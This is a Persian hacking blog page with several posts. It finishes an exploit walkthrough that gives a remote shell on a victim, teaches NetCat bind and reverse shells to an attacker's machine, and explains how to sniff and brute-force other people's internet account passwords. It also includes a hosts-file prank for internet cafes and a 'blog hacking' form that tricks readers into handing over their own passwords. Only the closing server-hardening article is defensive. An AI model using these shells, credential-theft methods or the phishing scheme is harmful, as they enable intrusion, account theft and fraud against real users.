و در آخر بزنید exploit . حال برنامه یک لینک از ip شما به شما می دهد که در اینجا به من لینک http://217.216.30.40:8080 را می دهد و منتظر ارتباط با قربانی می ایستد . با کلیک قربانی روی این لینک شما در این برنامه shell از سیستم وی را مشاهده خواهید نمود .شما در این shell قادر به اجرای همه گونه فرمان بر روی سیستم قربانی می باشید به طور مثال Format یک درایو و پاک کردن فایل ها توسط دستورات dos. و انگار از سیستم قربانی وارد cmd شده اید . برای ارسال و گرفتن فایل هم می توانید به مقاله ی آموزشی که در سایت قرار داده شده رجوع کنید لینک اموزش ارسال فایل در shell با tftp
بابا ما این اموزش های باحال و میدیم اونوقت شما....درضمن دو تا لینک بالا که گزاشتم که نرم افزار ورژن جدید و کار با اون هست رو هر کی بخواد باید نظرات وبلاگ بره بالا اولا دوما به طرف میل میدم برنامش و اخه رو همه سیستم ها کار میکنه واسه همین مفتی بگیرین خطر ناکه...
+ نوشته شده در  یکشنبه دهم تیر 1386ساعت 13:27  توسط پیمان  | 
آموزش کامل NetCat
نت کت یکی از محبوبترین و پرکابردترین برنامه ها توسط هکرها می باشدبرای همین از نت کت به عنوان چاقوی همه کاره هم یادمی شود.درصورت باز بودن یک پورت روی سیستم شما ، شخص مهاجم یا هکر به راحتی می تواند از طریق نت کت به آن نفوذ کند.
نت کت برنامه ای است که درعین سادگی و کم حجمی دربسیاری ازحملات نفوذی حتی در سطوح خیلی پیشرفته مورد استفاده هکران قرار می گیرد کاراصلی که این برنامه برای یک هکر انجام می دهد این است که data ها را برروی پورت های باز بین دو کامپیوتر انتقال می دهد.
نت کت اولین بار توسط Hobbit برای نسخه های مختلف یونیکس ازجمله Linux و ... نوشته شده ودرسال 1996 منتشرشده است و بالا خره دراواخر سال 1998، Weld pond نسخه ای برای ویندوز NT را اینجاد نمود.
یکی ازقابلیت های جالب این برنامه را میتوان به ارتباط ازپورتی به پورت دیگریاد کرد.
نکته : «این برنامه قابلیت ارتباط دوطرفه رو داراست - Listener و Clients - چه روی پورت TCP چه UDP»
خوب حالا قبل از شروع توضیحات درمورد دستورات باید با دو تا تعریف آشنا شوید.
سرویس گیرنده :
می تواندازطریق یک درگاه به کامپیوترموردنظر وصل شودو اطلاعاتی راازاین طریق ارسال کند.
سرویس دهنده :
هردرگاهی موردنظرشماباشدرابازکرده و منتظردریافت اطلاعات می شود.
NetCat برای انتقال اطلاعات :
یکی ازعامیانه ترین و ساده ترین امکاناتی که نت کت به شما می دهد انتقال فایلها می باشد.این برنامه قادر است یک فایل رابین دوکامپیوتربه راحتی منتقل کند.نت کت ازمفیدترین و سودمندترین ابزارها برای انتقال ، اطلاعات است . درصورتی که نت کت برروی یک کامپیوتربه صورت سرویس دهنده فعال باشد می توان ازطریق یک پورت ، اطلاعات را انتقال داد.
طرز انتقال اطلاعات :
                                                                             
                                                                                                      nc -l -p 1234 >file 
NC = اجرای برنامه
l- = حالت سرویس دهنده
p 1234- = شماره درگاه (پورت)
[File] = محل ذخیره داده هاارسالی

                                                                       [fileِفایل] >  nc [remot machine] 1234
NC - اجرای برنامه
[remot machin] = نام کامپیوتر هدف (آی پی)
1234 = شماره پورت مورد نظر
[file] = اطلاعات با این اسم استخراج می شه

نکته درمورد < : « درصورتی که این علامت اسم یک فایل باشد به عنوان دستگاه خروجی مشخص می شود واطلاعات دریافت شده درون آن قرار می گیرند،درصورتی که اینکارصورت نگیرد اطلاعات برروی صفحه نمایش نشان داده می شود. »

NetCat و پویش ها (یافتن پورت های باز اعم از UDP & TCP ) :
یکی از بهترین و پرکاربرد ترین توانایی این برنامه قدرتمند جستجو کردن و یافتن درگاه های بازبرروی کامپیوتر مورد نظر می باشد.این برنامه به صورت سریع و به راحتی با IP مورد نظر ارتباط برقرار می کند.
نکته : « این برنامه ازتکنیک پویش پورت ها به صورت Vanilla که یک استاندارد می باشد،پشتیبانی می کند. »

                                                      echo QUIT nc -v -w 3 targetmachine startport endport
QUIT = این چهار کاراکتر به هر پورت بازارسال می شود
NC = اجرای برنامه نت کت
v- = خروجی Verbose برای نشان دادن درگاه های باز برروی صفحه نمایش
w 3- = در3 ثانیه به هر جورت یک پیغام می فرستد و منتظرمی شه که این پیغام برگرده و معلوم بشه ان درگاه باز است یا بسته است
target machin = نام کامپیوتری(آی پی) که نت کت روی اون می خواهد اسکن بزنه
start port  , end port = در اینجا شما تعیین می کنید که ازچه درگاهی تا چه درگاهی اسکن بزنه
NetCat و اینجاد ارتباط با یک درگاه باز و ارسال داده :
بعد از یافتن یک درگاه باز برروی کامپیوترهدف می توان ازاین برنامه جهت انتقال اطلاعات ( فایل ) استفاده کرد.
ارتباط و انتقال تحت درگاه های TCP :

                                                                                    nc remotemachine portnumber
NC = اجرای برنامه روی کامپیوتر مبدا
rempotemachine = نام کامپیوتر (آی پی)
portnumber = درگاه باز
ارتباط و انتقال تحت درگاه های UDP :

                                                                                nc -u remotemachine portnumber
NC = اجرای برنامه
u- = انتخاب پروتکل ارتباطی UDP
remotemachine = نام کامپیوتر(آی پی) هدف
portnumber = درگاه باز

NetCat و اجرای دستورات ازطریق خط فرمان :
یکی ازقابلیت های بسیار عالی که به درد نفوذگر می خوره این هست که می تونه یک فایل یا ... از راه دور اجرا کنه . (برای مثال شما یک تروجان مثل ساب سون رو برای کامپیوتر هدف می فرستید و بعد هم اجراش می کنید)
«کیف کردید نه ؟؟؟؟ 
                                                                                          
                                                                                                nc -l -p [port] -e/bin/sh
nc = اجرای برنامه نت کت
l- = حالت سرویس دهنده
p port- = شماره درگاه مورد نظربرای ارتباط
e/bin/sh- = آدرس برنامه ای که بعد از برقراری ارتباط باید اجرا بشه.

                                                                                       nc victimmachine portnumber
nc = اجرای برنامه
victimmachine = آدرس آی پی ماشین قربانی
portnumber = شماره پورت مورد نظر برای برقراری ارتباط ازطریق پروتکل TCP
دراین حالت نت کت برروی کامپیوتر قربانی درحالت انتظار باقی می ماندتانفوذگرشروع به ارسال کند.

NetCat و ایجاد نفوذ برروی کامپیوترموردنظردرحالت فعال :

                                                                            nc [attacker machine] [port] -e/bin/sh
nc = اجرای برنامه
attacker machine = آدرس آی پی کامپیوتر نفوذگر
port = شماره درگاه مورد نظر
e/bin/sh- = نام فایلی که بعد از اینجاد ارتباط ، اجرا خواهد شد.

                                                                                                               nc -l -p port
nc = اجرای برنامه
l- = حالت سرویس دهنده
p port- = شماره پورت مورد نظر
با کمک این روش شما می توانید ازدیوار آتش به راحتی عبور کنید. به این دلیل که دیوار آتش سعی می کنه که ازورود اطلاعات از بیرون به داخل جلوگیری کنه ولی برعکس این موضوع رو به درستی پوشش نمی ده!   

تذکر: تمام علامت های [ ] که درمتن بالا به کا برده شده در فرمول وجود ندارد و فقط برای تفکیک بهتر نوشته هاست.

+ نوشته شده در  یکشنبه دهم تیر 1386ساعت 13:26  توسط پیمان  | 
آموزش تخصصی هک وبلاگ های فارسی

قصد دارم در این پست هک حرفه ای  وبلاگ های فارسی را آموزش بدم. روشی که یاد میدم امتحان شده و کاملا جواب میده البته کمی فوت و فن داره که اونم بهتون یاد میدم تا با مشکلی بر خورد نکنید. روش کارم طوری که از کنترل پانل وبلاگ خودتون استفاده می کنید و هیچ گونه زحمتی برای هک کردن نمی کشید ولی به شرطی که ریزه کاری های کار را دقیقا انجام دهید. اگر از این آموزش نتیجه ای نگرفتید بدانید که دستورات گفته شده را دقیقا انجام نداده اید چون من این روش را در بیش از ده ها وبلاگ امتحان کردم و کاملا جواب میده. پس برای ادامه دوباره تاکید می کنم که دستورات را دقیقا اجرا کنید. اگر دوباره نتیجه ای نگرفتید در قسمت نظرات به بنده اطلاع دهید تا بنده مشکل را پیگیری کنم البته یادتان نرود شماره تلفنتان را نیز بنویسید تا در صورت نیاز با شما تماس بگیرم و اما ادامه آموزش....

 

برای هک وبلاگ به آدرس Http://Dumans.Mihanblog.Com بــرویـد. دومان با در یافت اطلاعاتی از شما و با نفوذ به سرور وبلاگ رمز وبلاگ درخواستی را به شما ارسال می کند. دقت داشته باشید دومان در وبلاگ های فارسی صد در صد و در وبلاگ های غیر فارسی 50 در صد جواب میده.

 

بعد از وارد شدن به دومان شما باید فرمی را طبق دستورات زیر پر کنید.(شکل فرم در زیر نشان داده شده است.)

توضیج بخش های مختلف:

1. Your Blog Address  شما باید در این قسمت آدرس وبلاگ خود را به صورت کامل بنویسد. توجه داشته باشید که آدرس وبلاگ را همراه با //:http  بنویسید.

بعد از نوشتن آدرس وبلاگ، دو عدد علامت + (مثبت) گذاشته و بعد از علامت مثبت ایمیل خود را می نویسیم.

   برای مثال فرض کنیم آدرس وبلاگ ما باشد » www.Blog.mihanblog.com و ایمیل (ای دی) ما باشد iran_chatroom@yahoo.com

در فرم به صورت زیر می نویسیم:

       Http://Blog.Mihanblog.Com++Iran_chatroom@yahoo.com              ایمیل خودمان++وبلاگ خودمان

 

2.Your Blog Password  در این قسمت باید رمز عبور وبلاگ مان را به صورت کامل درج کنیم. دقت داشته باشید که دومان برای پیدا کردن رمز عبور وبلاگ درخواستی به رمز عبور ما نیاز دارد و در صورت اشتباه وارد کردن رمز وبلاگمان، دومان نمی تواند رمز وبلاگ را پیدا کند.

 

* برای نوشتن زبان انگلیسی در قسمت 2 می توانید روی شکل (باتون-دکمه) فارسی کلیک کنید تا بتوانید انگلیسی بنویسید.

 

طریقه وارد کردن رمز عبور وبلاگ:

- - اگر از سرویس بلاگفا استفاده می کنید:      رمز عبور+fa

برای مثال اگر رمز عبور وبلاگمان test12 باشد. در فرم به صورت fa+test12 می نویسیم.

 

- - اگر از سرویس میهن بلاگ استفاده می کنید:           p2.رمز عبور.mp.نام کاربردی.mu

برای مثال اگر نام کاربردی ما mamoo باشد و رمز عبورمان baboo باشد. در فرم به صورت     mu.mamoo.baboo.p2

 

- - اگر از سرویسی غیر از سرویس های میهن بلاگ و بلاگفا استفاده می کنید. نوشتن رمزعبور به شرح زیر می باشد.

اول نام کاربردی یا همان یوزر نیم را می نویسیم(در صورتی که نیاز به یوزر نیم باشد) بعدا یک عدد علامت + گذاشته و رمز عبورمان را می نویسیم.

 

 

3. Blog Address For Hack آدرس وبلاگی که می خواهید هک کنید. دقت داشته باشید آدرس وبلاگ را همراه با //:http بنویسید.

 

4. To Agree در این قسمت دلیل هک کردن وبلاگ را ذکر کنید.

5. Submit با زدن این دکمه اطلاعات شما ذخیره می شود. بعد از 24 الی 48 ساعت رمز عبور هم به ایمیل و هم به قسمت نطرات خصوصی وبلاگ شما ارسال می شود. در بعضی از مواقع امکان دارد این عمل(ارسال رمز وبلاگ هک شده برای شما) بیش از یک هفته هم طول بکشد اگر بعد از طی مدت ذکر شده نتیجه ای نگرفتید دوباره برای پر کردن فرم اقدام کنید ولی این بار راهنمای فرم را به دقت مطالعه کنید.

6. Reset با زدن این دکمه فرم پاک سازی می شود.

 

توجه!  توجه!

روش مقابله با هک شدن وبلاگ(امنیت وبلاگ شما در برابر هک شدن):

به کنترل پانل وبلاگ خود وارد شده و در قسمت تنظیمات وبلاگ رفته و ادرس پست الکترونیکی (ایمیل نویسنده) را پاک کرده و webmaster_javan2008@yahoo.com  را جایگزین ایمیل قبلی کنید و نتظیمات را ذخیره کنید.

بعد از انجام این عمل وارد آدرس Http://www.Dumans.Mihanblog.com  شده و طبق دستورات زیر فرم دومان را پرکنید.

 

1. Your Blog Address در این قسمت نام وبلاگ خود را می نویسیم.

2. Your Blog Password در این قسمت باید آدرس ایمیل خود را وارد کنید.

3.  Blog Address For Hack دراین قسمت نوع محافظ سیستم (وبلاگ)را انتخاب کنید.

- -  Avg

- - Panda

- - Doctor Web

- - Macaf

- - Norton

- - Win Firewall

یکی از گزینه های بالا را انتخاب کنید.خود بنده نوع avg را انتخاب کردم.چون سرعت سیستم رو پائین نمی یاره به علاوه قدرت محافظت بالایی هم داره.

 

4. در این قسمت کلمات زیر را بنویسید.

 

if firewall<>1 then

goto avg.bba

end if

 

5. با زدن این دکمه تنظیمات را ذخیره کنید.

با انجام عملیات بالا وبلاگ شما به صورت صد در صد در مقابل انواع حملات و انواع هک ها حفاظت می شود البته تا زمانیکه ایمیل وب مستر جوان راپاک نکرده اید. زمانیکه ایمیل وب مستر جوان را از وبلاگ خود پاک کنید حفاظت از وبلاگ نیز قطع خواهد شد.

 

توافق : دوست عزیز ما به در خواست شما عمل میکنیم و وبلاگی که شما ذکر کردید را هک می کنیم دومان ،  تنها خواهان همکاری شما با ماست! دومان را به دوستان خود معرفی کنید.

+ نوشته شده در  یکشنبه دهم تیر 1386ساعت 13:19  توسط پیمان  | 
هک کارت اینترنت ( به همراه نرم افزار )
 

اموزش هك کارت اينترنتي (حتما جواب ميده)

سلام دوستان امروز مي خوام براتون اموزش به دست اورت اكانت اينترنتي رو با با اسنيفر ها توضيح بدم  حالا بگین پیام بده !روش كار به اين صورت كه شما برنامه اي رو كه من لينكش رو براتون گذاشتم دانلود مي كنيد و بعد از اجرا كردن برنامه به دنبال بستهايي ميگرده كه رد و بدل مي شن مثلا اگه يكي در اون لحظه كه شما با اسنيفر كا ميكنيد يوزر و پسوردش رو در htlm يا ftp رد و بدل كنه اسنيفر به دنبال پسورد و يوزر اون شخص مي پردازه و بعد به شما گزارش ميده . راستي بايد يك چيزي رو بگم كه ممكنه اسنيفر براي پيدا كردنه پسورد و يوزر نام كمي شما رو خسته كنه چون . گاهي اوقات 1يك ساعت يا دو ساعت طول ميكشه تا پسورد و يوزري رو كه در محدوده ي اي اس پي شما هست رو گزارش بده.

اينم از لينك دانلود اسنيفر باحال

+ نوشته شده در  جمعه هشتم تیر 1386ساعت 21:17  توسط پیمان  | 
روش هاي جديد براي باز کردن سايت فيلتر شده
روش 1 : به زمينه رفته و از اين امکان که در حال حاضر جواب مي دهد استفاده کنيد همچنين از سايتهاي http://nofiltering.blogspot.com  و http://www.publicproxyservers.com


 روش 2 : برنامه و تولبار ايراني به نام پرديس پروکسي را از اينجا و يا اينجا با ورژن 4 داونلود کنيد. همراه با 10 امکان ديگر که براي اطلاعات بيشتر به سايت رسمي اين برنامه مراجعه کنيد.
 
 روش 3: اين روش که از سايت گوگل استفاده مي شود بهترين راه حل بوده ومطمئناً هيچگاه از طرف مخابرات بسته نخواهد شد

آدرس سايت مورد نظر خود را در google.com جستجو كنيد و سپس در نتايج جستجو بر روي  cached كليك كنيد

با اين روش صفحات چند روز قبل سايت را كه در حافظه گوگل قرار گرفته را خواهيد ديد .

همچنين مي توانيد  به سايت گوگل برويد www.Google.com  سپس به قسمت تنظيمات زبان رفته و زبان انگليسي را انتخاب کنيد... همانطور که مي دانيد يکي از بهترين امکانات گوگل مترجم آن مي باشد که در قسمت مترجم سايت فيلتر شده را تايپ کنيد و دکمه اينتر را فشار دهيد

يك روش خوب وموثر براي عبور از فيلترهاي اينترنتي

در اين روش شما نيازي به نصب هيچ برنامه اي نداريد و تنها با تنظيم  اينترنت اكسپلورر خود و وارد كردن چند عدد در آن مي توانيد از سد فيلترهاي اينترنتي مخابرات عبور كنيد و با خيال راحت در در در دنياي اينترنت گردش كنيد -  روش كار به اين صورت است

به قسمت Internet Option  در Control Panel  برويد و بر روي Connections رفته و بر روي سرويس اينترنتي كه از آن استفاده مي كنيد و با آن را انتخاب نموده و بر روي Settings كليك كنيد - حال Use Proxy  را تيك بزنيد و در قسمت آدرس يكي از شماره هاي IP را در جدول زير وارد كنيد و در مقابل آن و در قسمت Port - شماره پورت را وارد كنيد و كليك كنيد. اگر يكي از شماره ها جواب نداد و كار نكرد - يكي ديگر را امتحان كنيد .

تذكر : براي ورود به بعضي از سايتها ( مثلاً ايميل ياهو ) بايد تيك استفاده از پروكسي را موقتاً برداريد .

ميتوانيد از آدرس آي پي و  پورتهاي زير استفاده كنيد

IP Address

Port

195.175.37.6

8080

217.110.71.114

8080

195.175.37.23

8080

210.187.110.230

8080

61.107.109.130

8080

62.231.38.245

8080

211.126.196.172

8080

62.190.148.33

8080

202.134.0.136

8080

203.197.203.35

8080

200.69.129.242

81

خوبه !
+ نوشته شده در  جمعه هشتم تیر 1386ساعت 21:6  توسط پیمان  | 
هک ISP با Ac-hacker
نرم افزاری برای هک مراکز ارائه دهنده اینترنت که با آن می توانید یوز و پس کارت های اینترنتی آی اس پی ها را بردارید. البته ما این نرم افزار را برای امنیت بیشتر مراکز اینترنتی ارائه می کنیم تا به تشکیلات خود اطمینان بیشتری داشته باشند. ( عواقب هر گونه استفاده غیر مجاز از این نرم افزار به عهده کاربر می باشد و سایت در قبال آن هیچ گونه مسئولیتی ندارد )

 آموزش نرم افزار : این نرم افزار برای بدست آوردن password کارت های اینترنتی است.
روش استفاده از برنامه:
این برنامه چند بخش دارد:
یک ....
computername or ip : 
در این قسمت IP سایتی که می خواهید از این روش اکانت آن را بدست بیاورید وارد می کنید  
Port : 
در این قسمت شما میتوانید پورت ۲۱ یا ۷۹ را وارد کنید البته اگر باز بود (باید پورت مورد نظر حتما open باشد)
current password : 
در این قسمت چیزی وارد نکنید خود برنامه به صورت اتوماتیک عملیات را انجام می دهد. 
Usernsme : 
در این قسمت باید آیدی که میخواهید کرک کنید را وارد کنید مثلا Username یک کارت
که می توانید خود شما هم حدس بزنید (معمولا برای کارت اینترنت از یک قانون خاصی استفاده می می شود )
Dictionary File : 
در این قسمت باید اسم لیست پسورد را انتخاب کنید
شما هم میتوانید از برنامه تولید پسورد خود برنامه انتخاب کنید(این کار بهتر است) یا از لیست پسوردی که
خود شما در یک فایل TXT ذخیره کرده اید استفاده کنید ....از اینترنت هم میتوانید بدست بیاورید. 

دو .....Attack Option
Dictionry Attack :
اگر میخواهید از لیست پسورد برای پیدا کردن پسورد استفاده کنید باید اینجا رو تیک بزنید
توجه : passlist معمولا یه فایل که تعداد زیادی پسورد ذخیره دارد و شما میتوانید آن را از 
اینترنت پیدا کنید و معمولا یک فایل TXT یا pas هست.
اگر اینجا را تیک بزنید باید آدرس این فایل را در هارد خود یعنی جایی که ذخیره کرده اید را
بنویسید مثلا : c: ew folderpasslist.txt
این آدرس را باید در قسمت قبل یعنی Dictionary File وارد کنید.
Brute Force attack :
این گزینه رو حتما باید تیک بزنید.
Reconnect on disconnect :
این یکی را هم حتما باید تیک بزنید.
AutoSave every 100 Attack :
این گزینه بعد از هر ۱۰۰ بار چک کردن نتیجه را براتون save میکند

سه.....Brute Force option
در این قسمت شما باید نحوه چک کردن پسورد را تنظیم کنید. برای مثال کارت اینترنتی به صورت زیر :
Username :kcn3463734
Password:  hfydhet
خوب اول شما باید یک Username دیگر را برای چک کردن حدس بزنید و با کمی تعییر
می شود به راحتی این کارا کرد چون اکثر شبکه ها برای Username های خود را از یک
فرم خاص استفاده میکنند.برای مثال من این username را انتخاب میکنم:kcn3462628
دقت کنید که تعداد کاراکتر ها ثابت است و من فقط سعی کردم اعداد آخر رو تغییر دادم.
که شانس وجود داشتن این username بیشتر می شود.
در قسمت پسورد ما فقط به دو فاکتور اهمیت می دهیم. 
اول : پسورد . اگر از عدد و حروف تشکیل شده است.
پس شما باید بر طبق همین قسمت a-z و 0-9 را تیک بزنید و اگر فقط از حروف یا عدد تشکیل شده بود یکی را تیک می زنید.
دوم : تعداد کارکتر های تشکیل دهنده پسورد ما چقدر است ؟ که برای مثال من کارکتر ۷ را انتخاب می کنم.
پس من عدد ۷ رو باید در قسمت Number of characters to start on تایپ کنم
این دیگه بستگی به خلاقیت شما دارد.

چهار ....در این قسمت کار تنظیمات دیگر تمام شده است و ما باید برای شروع
دکمه Conecct رو فشار بدهیم.

فقط یادتون باشد که این روش  حوصله میخواد ولی ۱۰۰٪ جواب میده مطمئن باش وقت کافیه یکبار به نتیجه برسی و اگر نرسیدی در isp های دیگر امتحان کن و منهم برای راهنمایی در خدمتم 

+ نوشته شده در  جمعه هشتم تیر 1386ساعت 21:0  توسط پیمان  | 
حال کافی نتها رو بگیرید
سلام بچه ها خوبيد
این دفعه میخوام راههای کرم ریختن رو یادتون بدم ...
ميدونم الان ميگيد مخابرات کم فيلتر ميکنه اينم داره اموزش فيلتر کردن رو ميده خوب ميتونين اين روش رو بريد تو کا فينت بر سر يه سيستم بياريد .خوب بريد تو RUN (از طريق منوی استارت)وبعد تايپ کنيد SYSTEM32 بعد به شاخه drivers و بعد etc ميريد يه فايل به نام hosts ميبينيد اونو بوسيله notepad باز کنيد توش يه سری نوشته ميبينيد که شبيه اينه:
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

127.0.0.1 localhost

به خط ها کاری نداريم ميریم اخرش سراغocalhost و اونو تغيير ميديم يعنی پاکش ميکنيم و به جاش آدر س سايتی رو که می خوايم فيلتر کنيم می نويسيم مثلا در کا فينت ها ۹۸٪ افراد به سايت يا هو ميرن تا چت کنن يا ايميلشون رو چک کنن و شما می تونين حالشون رو بگيرید به اين صورت انجام ميديم:

http://www.yahoo.com/ ۱۲۷.۰.۰.۱

در اين صورت هرکی رو اون کامپوتر بخواد به سايت ياهو بره با پیغامcannot page displayed مواجه ميشه این عمل در مورد عکس ها هم کار برد .داره موفق باشيد
راستی داشت يادم ميرفت اين روش فقط رو xp و 2003 جواب ميده.
+ نوشته شده در  جمعه هشتم تیر 1386ساعت 20:58  توسط پیمان  | 
روشهاي پنهان سازي وب سرور براي افزايش ايمنی
پوشش دادن يا پنهان كردن يك وب سرور شامل از بين بردن جزئيات هويتي اي است كه هكرها مي توانند براي كشف سيستم عامل و وب سرور نصب شده روي آن مورد استفاده قرار دهند. اين اطلاعات در حالي كه هيچ استفاده اي براي بهره برداران مشروع ندارد ، اغلب نقطه شروعي براي هكرها مي باشد.
دراين مقاله به بررسي برخي راهكارهايي كه مي توانيم با بكارگيري آنها خطر شناسايي را به حداقل برسانيم ، مي پردازد. بيشتر مثالها مربوط به IIS ميكروسافت مي باشد . زيرا بخاطر آسيب پذيري زيادش به طور وسيعي مورد توجه نفوذگران قرار گرفته است. همچنين يك سري از اقدامات پيشگيرانه شناسايي براي آپاچي سرور نيز ذكر خواهد شد. غير قابل شناسايي كردن سرور وظيفه همه كساني است كه مسئوليت اجرايي وب سرور را بر عهده دارند.

نفوذگران از اينجا شروع مي كنند ، چرا شما از اين نقطه شروع نمي كنيد ؟
بگذاريد از نقطه نظر مهاجمين نگاه كنيم. آسيب پذيريهاي امنيتي اتكا بر ورژن و نوع نرم افزار دارند.
يك نفوذ گر براي نفوذ به يك وب سرور بايد بداند وب سرور از چه نوعي و داراي چه ورژني مي باشد. دانستن جزئيات يك وب سرور كارآمدي هرگونه تهاجمي را به مقدار زياد افزايش مي دهد.

Server Header ها همه چيز را مي گويند:
بسياري از وب سرورها خودشان و سيستم عاملي را كه بر روي آن نصب هستند به هر كسي كه بخواهد معرفي مي نمايند. با استفاده از ابزارهای بررسي شبکه مانندSam Spade يا Header Check مي توانيد http هدرهاي سرور را تشخيص دهيد. تنها كافيست Home Page وب سايت را درخواست نموده وhttp هدرهاي حاصله يا بنرهايي كه توسط سرور ارسال گرديده را مورد بررسي قرار دهيد. در ميان آنها احتمالا چيزي شبيه به Server : Microsoft – IIS/5.0 پيدا خواهيد كرد.
آپاچي سرور نيز به صورت پيش فرض همه مشخصات را اعلام می کند.
Server : Apache/2.0.41-dev(unix)
كاربران آپاچي سرور 2.x داراي مدول Mod Header هستند . این کاربران مي توانند به سادگي فايل httpd.conf را به صورت زير اديت نمایند :
Header Set Server "New Server Name"
متاسفانه در نسخه هاي پيشين آپاچي سرور نمي توان سرور هدرها را تغيير داد.
كاربران IISنیز مي توانند Lock Down را نصب نموده و براي برداشتن وجايگزين كردن هدرها از فايل پيكره بنديURLScans استفاده نمايند. در صورتي كه از سرور Cold Fusion استفاده مي نماييد و مي خواهيد URLScans را به كار بريد بسيار محتاط باشيد. زيرا روشي كه در حال حاضر هدرها را جايگزين
مي نمايد باعث خسارات سنگيني به صفحات CFM مي گردد. در اين حالت تنها راه ممكن برداشتن هدرهاست.

پسوند فايلها :
نمايش پسوند فايلها مانند .ASP يا .ASPX به طور مشخص نشان دهنده آن است كه شما از يك سرور
ميكرو سافت استفاده مي كنيد. به طور كلي پنهان كردن پسوند فايلها كار مفيدي است. در طراحي سايتها سعي كنيد ازHTML و Java استفاده كنيد. پسوند فايلهاي طراحي شده توسط اين زبانها نشان دهنده نوع وب سرور نمي باشد.
در مورد آپاچي سرور به مدول mod negotiation توجه خاصي داشته باشيد. بوسيله اين مدول مي توانيد پسوند فايلها را مخفي كنيد. همچنين توسط mod header مي توان پسوند فايلها را تعويض نمود.
كاربران IIS نيز مي توانند از برنامه PageXChanger براي پنهان ساختن پسوند فايلها استفاده نمايند.

ASP Session ID Cookie:
اين كوكي ها وظيفه حفظ وضعيت سرويس گيرنده را بر عهده دارند و به سادگي سيستم عامل و وب سرور نصب شده بر روي آن را مشخص مي كنند.
Set –Cookie:ASPESSIONIDQGQGGWFC=MGMLNKMDENPEOPIJHPOPEPPB;
شما مي توانيد ASP Session State را از كار بيندازيد. همچنين مي توانيد براي تغيير اسامي كوكي ها از يك فيلتر ISAPI استفاده نماييد. از طرفي ASP Session ها باعث محدود شدن منابع سيستم مي گردند. از كار انداختن آن به بهبود اجرايي ASP كمك مي كند و باعث گمنام ماندن سرور شما نيز مي گردد.

WebDAV:
راه ديگر شناسايي سرورهاي ويندوزي WebDAV مي باشد. WebDAV منحصر به ميكروسافت يا IIS نمي باشد ، بلكه يك استاندارد پيشنهادي (RFC 2518) با گروه كاري IETF است. سرور ويندوزي در حالت پشتيباني WebDAV اطلاعات زيادي را به هدر مي افزايد كه مي تواند مورد استفاده هكرها قرارگيرد. در صورتيكه از WebDAV براي پشتيباني Web Folders , Outlook Web Access يا ... استفاده
نمي نماييد، مي توانيد با استفاده ازIISLockDown يا تغيير در رجيستري آن را از كار بيندازيد.

هدرهاي ديگر:
برخي از سرورهاي وب به وسيله نمايش هدرهاي خاص در پاسخهاي HTTP هويت خود را فاش
مي سازند. هدرهاي X-Powered-By و X-ASPNET-Version علائم بارزي هستند كه نشان دهنده استفاده از ASP.NET و بنابراين ميزباني IIS مي باشند. همچنين به ياد داشته هدرهاي
Microsoft Office Web Server را بايد مخفي كنيد.

Windows Authentication:
كاربران IIS نبايد Windows Authentication را به عنوان راهي براي پنهان نمودن اطلاعات بر روي سرور مورد استفاده قرار دهند. زيرا اين شيوه اطلاعات زيادي را در مورد سرور بر ملا مي سازد. يك هكر
مي تواند با توجه به هدرهاي Authentication WW- نوع وب سرور را مشخص نمايد. زماني كه يك فايل يا فلدر توسط پروسه Authentication ويندوز محافظت مي شود، درهدرهاي فرستاده شده از طرف سرور String NTLM وجود دارد كه مي تواند مورد بهره برداري هكر قرار گيرد.

پيام هاي پيش فرض:
پيامها ، صفحات و اسكريپتهاي پيش فرض نيز باعث شناسايي وب سرور مي گردد. اغلب نرم افزارهاي پشتيباني كننده وب سرور داراي پيغامهاي پيش فرض هستند كه بايد به گونه اي مناسب تغيير پيدا كند. همچنين تمام Administration Pages ، اسكريپتها وDocument هايي كه همراه با وب سرور نصب مي شوند بايد مخفي يا پاك شوند.

ديگر سرويسها:
بسياري از کامپیوترهایی كه با عنوان وب سرور استفاده مي شوند ، جدا از خدمات HTTP خدمات ديگري مانند SMTP و FTP را ارائه مي دهند. به عنوان يك قانون امنيتي سعي كنيد چنين سرويسهايي را در وب سرور خود راه اندازي نكنيد. به ويژه از سرويسهاي پيش فرض FTP و SMTP در ميكرو سافت IIS اجتناب كنيد. زماني كه يك ارتباط با سرويس SMTP برقرار مي گردد. يك پيغام خوشامد گويي براي Client فرستاده مي شود. اين پيغام هيچ تاثيري در سرويس ايميل ندارد. اما مشابه هدرهاي HTTP اطلاعاتي را در مورد وب سرور بر ملا مي سازند. سرويس پيش فرض SMTP ويندوز چنين اطلاعاتي را نمايان مي سازد . همچنين سرور پيش فرض IIS FTP يك بنر شناخته شده را ارائه مي دهد . از آنجايي كه اصلاح اين بنر از اصلاح بنر SMTP پروسه پيچيده تري است بهترين راه جايگزيني آن با يك FTP سرور ديگر مانند RhinoSoft's Serv-U FTP Serverاست . كه بتوان هرگونه پيغامي را در بنر FTP نمايش داد. همچنين اين FTP سرور داراي امتيازات ديگري نيز از نظر ايمني مي باشد.
ورودهاي غير مجاز :
بسياري از Exploits ها از يك URL پيچيده براي گرفتن شل (Shell ) يا كنترل يك CGI Program استفاده ميكنند كه هكر بوسيله آنها مي تواند ليستي از فايلها سيستم عامل را بدست آورد. بهترين روش براي مقابله با اينگونه حملات استفاده از يك فيلتر داده مي باشد كه كاراكترهاي غير قابل قبول مثل متا كاراكترها را از اطلاعاتی که توسط كاربر وارد می شود حذف نمايد. براي IIS استاندارد جاري IISLockDown/URL Scan است. نسل جديدي از Firewall ها نيز قابليت پشتيباني از لايه هاي كاربردي Web Server را دارا هستند.

پشته ها:
